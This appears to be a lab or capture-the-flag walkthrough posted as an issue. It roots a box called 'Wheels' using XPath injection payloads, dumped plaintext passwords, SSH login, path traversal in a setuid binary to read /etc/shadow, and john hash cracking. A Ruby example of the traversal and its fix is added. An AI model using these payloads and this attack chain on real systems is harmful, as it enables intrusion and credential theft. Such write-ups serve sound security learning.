WDavid404 opened this issue 4 months ago
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 61 OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
80/tcp open http syn-ack ttl 61 Apache httpd 2.4.41 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET POST OPTIONS HEAD
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Wheels - Car Repair Services
Access port 80 and register a new user "test". But we cannot access /portal.php --> Access Denied
Try to register with "info@wheels.service" --> succeeds, and now we can access /portal.php. So we have six user names --> SSH brute force?
Try GET /portal.php?work='+order+by+6+--//&action=search --> XPath injection issue https://book.hacktricks.xyz/v/jp/pentesting-web/xpath-injection
Use Burp Suite Intruder with the wordlist from hacktricks:
') or 1=1 or ('
') or 1=1] | //user/password[('')=('
') or 2=1] | //user/node()[('')=('
')] | //./node()[('')=('
')] | //node()[('')=('
') or 1=1] | //user/password[('')=('
')] | //password%00
')]/../*[3][text()!=('
')] | //user/*[1] | a[('
')] | //user/*[2] | a[('
')] | //user/*[3] | a[('
')] | //user/*[4] | a[('
--> ')] | //password%00 works and dumps every password:
Iamrockinginmyroom1212
iamarabbitholeand7875
johnloveseverontr8932
lokieismyfav!@#12
alreadydead$%^234
lasagama90809!@
Try SSH with the user list and password list --> bob:Iamrockinginmyroom1212 works!
find / -perm -u=s -type f 2>/dev/null --> /opt/get-list --> Download it to Kali and analyze it
strings get-list (To install strings: sudo apt-get install binutils)
--> so we can make it read /etc/shadow by passing "../../etc/shadow" --> root:$6$Hk74of.if9klVVcS$EwLAljc7.DOnqZqVOTC0dTa0bRd2ZzyapjBnEN8tgDGrR9ceWViHVtu6gSR.L/WTG398zZCqQiX7DP/1db3MF0:19123:0:99999:7:::
unshadow passwd.txt shadow.txt > unshadowed.txt
john --format=crypt --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt
--> highschoolmusical (root)
su root with the password above --> works!
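The get-list bug is a path traversal in a setuid binary. As an added example (not get-list's actual code, which the page does not show; it is assumed to open a file under a fixed directory using a caller-supplied name), here is that pattern and its fix in Ruby: the vulnerable read joins the name onto the base directory, so `../secret` escapes, while the hardened read canonicalises with `File.realpath` and refuses anything that resolves outside the base, which also catches a symlink planted inside the directory. Everything runs in a temporary directory with constructed files.

```ruby
require 'tmpdir'
require 'fileutils'

# Vulnerable: a user-controlled name is joined onto the base directory and
# opened as-is, so "../" walks out of it (the assumed get-list behaviour).
def vulnerable_read(base, name)
  File.read(File.join(base, name))
end

# Hardened: resolve the final path (following symlinks) and refuse anything
# that does not stay inside the canonical base directory.
def safe_read(base, name)
  root = File.realpath(base)
  target = File.expand_path(name, root)   # normalises ../ and absolute names
  resolved = File.realpath(target)        # raises Errno::ENOENT if missing
  unless resolved == root || resolved.start_with?(root + File::SEPARATOR)
    raise ArgumentError, "refusing to read outside #{root}: #{name}"
  end
  File.read(resolved)
end

# Build a throwaway layout: tmp/lists/allowed.txt, tmp/secret next to it,
# and a symlink inside lists pointing at the secret. All constructed.
def demo
  Dir.mktmpdir do |tmp|
    lists = File.join(tmp, 'lists')
    FileUtils.mkdir_p(lists)
    File.write(File.join(lists, 'allowed.txt'), "legit list\n")
    # Constructed stand-in for /etc/shadow, outside the list directory.
    File.write(File.join(tmp, 'secret'), "root:$6$constructed:19123:0:99999:7:::\n")
    File.symlink(File.join(tmp, 'secret'), File.join(lists, 'link'))

    reject = lambda do |name|
      safe_read(lists, name)
      nil
    rescue ArgumentError => e
      e.message
    end

    {
      vulnerable: vulnerable_read(lists, '../secret'),  # leaks the secret
      allowed:    safe_read(lists, 'allowed.txt'),      # legitimate read
      traversal:  reject.call('../secret'),             # rejected
      symlink:    reject.call('link'),                  # rejected
    }
  end
end

if $PROGRAM_NAME == __FILE__
  demo.each { |k, v| puts "#{k}: #{v.inspect}" }
end
```

The prefix check must be done on the realpath result, not on the string the caller supplied: checking `name` for `..` misses symlinks, and checking the joined path before resolution misses both.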
Key points:
Register an admin user with the email (info@wheels.service) to overwrite the original one --> access to some restricted pages.
XPath Injection (https://tcm-sec.com/understanding-xpath-injection-a-beginners-guide/)
XPath injection Burp Suite Intruder wordlist (see above)
strings tool to analyze a binary file (e.g. get-list)